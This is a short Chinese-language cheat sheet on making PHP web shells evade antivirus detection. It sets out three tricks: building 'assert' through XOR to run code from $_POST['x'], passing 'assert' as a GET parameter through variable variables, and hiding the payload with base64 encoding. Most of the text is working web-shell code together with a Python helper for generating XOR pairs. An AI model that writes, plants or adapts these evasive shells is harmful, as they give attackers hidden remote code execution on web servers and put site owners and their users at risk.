WebShell免杀总结

1、异或运算 过免杀 无字符后门

 '!' ^ '@' -->‘a’

异或运算 过免杀

<?php $a='!' ^ '@' .'ssert' ; $a($_POST['x']); ?>

for i in range(1,127):

for j in range(1, 127):

k = i ^j

if chr(k)=='a':

print("{0}^{1}={2}". format( chr(i),chr(j),chr(k)))

2、把关键字当作参数传递

1.php?x=b&y=assert; z=phpinfo();

关键字当参数 免杀

<?php

$a=$_GET['x'];

$$a=$_GET['y'];

$b($_POST['z']);

?>

3、前端url参数加密，后端代码解密

1.php?x=b&y=assert; z=base64.encode( phpinfo());

$b(base64.decode($_POST['z']));